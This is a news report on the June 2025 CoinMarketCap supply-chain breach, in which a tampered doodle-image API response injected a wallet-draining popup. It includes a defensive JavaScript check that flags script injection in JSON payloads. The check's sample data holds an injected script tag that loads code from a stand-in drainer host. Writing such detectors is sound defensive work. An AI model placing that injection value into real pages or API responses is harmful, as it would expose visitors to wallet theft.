CoinMarketCap, a leading platform for tracking cryptocurrency prices, recently experienced a significant cybersecurity breach involving a supply chain attack that compromised the safety of its website visitors. The incident exposed users to a wallet drainer campaign, resulting in stolen cryptocurrency from unsuspecting individuals who interacted with a malicious popup.
The issue began surfacing on the evening of June 20, 2025, when users visiting CoinMarketCap encountered unexpected Web3 prompts requesting wallet connections. While these popups appeared to be legitimate, they were actually part of a coordinated attack involving injected malicious scripts. Once users connected their wallets through the popup interface, their assets were covertly transferred to the attackers.
According to an official statement released by CoinMarketCap, the breach was traced to a vulnerability linked to the homepage’s animated doodle image. The company explained that the image contained a link which triggered unauthorized JavaScript code via an API call. This led to the popup appearing for some users upon visiting the homepage.
CoinMarketCap confirmed that its security team acted promptly upon discovering the issue. The malicious content was removed, the source of the problem identified, and a series of remediation measures were introduced to prevent future exploitation. The platform assured users that normal operations had resumed and that its systems were fully secure once again.
CoinMarketCap is hacked… you will get drained! pic.twitter.com/cwSFQ0M0rg
— Dark Web Informer – Cyber Threat Intelligence (@DarkWebInformer) June 20, 2025
Messages in "com"-related group chats revealed that a threat actor using the moniker "Spadle" is behind the CMC attack.
— Rey (@ReyXBF) June 21, 2025
Cybersecurity researchers at c/side later provided further technical insights into the breach. They stated that the attack was carried out by altering the JSON payload of the API responsible for displaying the doodle image. The altered data included a script tag that introduced a wallet-draining script sourced from an external domain named “static.cdnkit[.]io.” This script generated a convincing wallet connection popup using CoinMarketCap’s branding, tricking users into authorizing transactions that ultimately drained their crypto wallets.
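As an added example (not code from CoinMarketCap or c/side), the following check walks a JSON payload such as the doodle response described above and flags script tags, inline handlers and URLs whose host is not on an allowlist, so a tampered response can be rejected before it is rendered. The function name `auditPayload`, the field names and the `.example` hosts are assumptions constructed for illustration.

```javascript
// Heuristic patterns for active content inside JSON string values.
const ACTIVE_RE = [
  [/<\s*script\b/i, "script tag"],
  [/\bon[a-z]+\s*=/i, "inline event handler"],
  [/javascript\s*:/i, "javascript: URI"],
];
const URL_RE = /(?:https?:)?\/\/[^\s"'<>)]+/gi;

// Walk the payload and return [{ path, issue }] for every suspicious string.
function auditPayload(value, allowedHosts, path = "$", findings = []) {
  if (typeof value === "string") {
    for (const [re, label] of ACTIVE_RE) {
      if (re.test(value)) findings.push({ path, issue: label });
    }
    for (const raw of value.match(URL_RE) || []) {
      let host;
      try {
        // Protocol-relative URLs (//host/x) resolve against an https base.
        host = new URL(raw, "https://base.invalid").hostname.toLowerCase();
      } catch {
        findings.push({ path, issue: "unparseable URL" });
        continue;
      }
      if (!allowedHosts.has(host)) {
        findings.push({ path, issue: `host not allowlisted: ${host}` });
      }
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => auditPayload(v, allowedHosts, `${path}[${i}]`, findings));
  } else if (value && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      auditPayload(v, allowedHosts, `${path}.${k}`, findings);
    }
  }
  return findings;
}

// Constructed sample data: hosts and field names are hypothetical.
const ALLOWED = new Set(["assets.site.example"]);
const cleanDoodle = {
  frames: ["https://assets.site.example/doodle/frame1.json"],
  link: "https://assets.site.example/campaign",
};
const tamperedDoodle = {
  frames: cleanDoodle.frames,
  link: 'https://assets.site.example/campaign"><script src="https://drainer.example/pop.js"></script>',
};

console.log(auditPayload(tamperedDoodle, ALLOWED));
```

The patterns are heuristics for a server-side gate or monitoring job; a Content-Security-Policy that restricts `script-src` to known hosts covers the same case in the browser.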
On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected pop-up for some users when they visited our homepage.…
— CoinMarketCap (@CoinMarketCap) June 21, 2025
🚨 Be aware of scammers!
🔹 CoinMarketCap will NEVER DM you first. If you receive a message claiming to be from CMC & asking for funds, it's a scam!
Always verify before sending out your funds!
Stay #SAFU
— CoinMarketCap (@CoinMarketCap) June 22, 2025
Analysts classified the breach as a supply chain attack, where the compromise occurred not on CoinMarketCap’s servers directly, but through a third-party service integrated into the platform. These types of attacks are notably difficult to detect because they exploit elements perceived as trusted within a system’s architecture.
Additional details about the breach emerged from a threat actor operating under the alias Rey. According to cybersecurity sources, the attacker disclosed information via a Telegram group, where they also shared a screenshot of the drainer panel. This dashboard indicated that approximately $43,266 worth of cryptocurrency was stolen from 110 victims during the incident. The attackers were reportedly communicating in French within the Telegram channel.
This breach highlights the rising threat of wallet drainers across the cryptocurrency ecosystem. Unlike traditional phishing scams, wallet-draining attacks are increasingly disseminated through social media, fake advertisements, spoofed websites, and browser extensions embedded with malicious scripts.
Recent data indicates that wallet drainer attacks were responsible for nearly $500 million in stolen assets throughout 2024, impacting over 300,000 wallet addresses. In response to the growing problem, platforms like Mozilla have begun deploying detection systems in their browser repositories to identify and block harmful wallet-draining extensions.
The CoinMarketCap incident underscores the urgency for platforms operating in the Web3 space to implement stronger safeguards against sophisticated attack vectors, particularly those involving third-party integrations. As decentralized technologies continue to expand, so too does the need for vigilant, multi-layered cybersecurity protocols.